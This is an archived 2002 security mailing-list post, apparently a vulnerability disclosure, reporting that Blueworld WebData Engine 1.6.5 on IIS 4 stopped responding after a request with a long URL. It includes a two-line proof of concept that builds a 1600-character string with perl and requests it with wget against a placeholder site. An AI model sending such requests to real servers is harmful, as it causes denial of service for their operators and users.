Blueworld WebData Engine 1.6.5

From: Replugge [Rod] (repluggeat_private)
Date: Thu Feb 14 2002 - 00:28:36 PST

    The other day i run through a web server that was running
    Blueworld WebData Engine 1.6.5 and IIS 4, for my surprise after
    sending a really "simple" attack the server stop responding,
    could someone thats running WebData engine 1.6.5 verify this.

    exploit:

    export ATTACK=`perl -e "print 'A' x 1600"`
    wget http://site.com/$ATTACK

    I'm not sure about the conditions, perhaps it could be misconfiguration
    of the server.

    --
    /*
    Rodrigo Gutierrez                   <rodrigoat_private>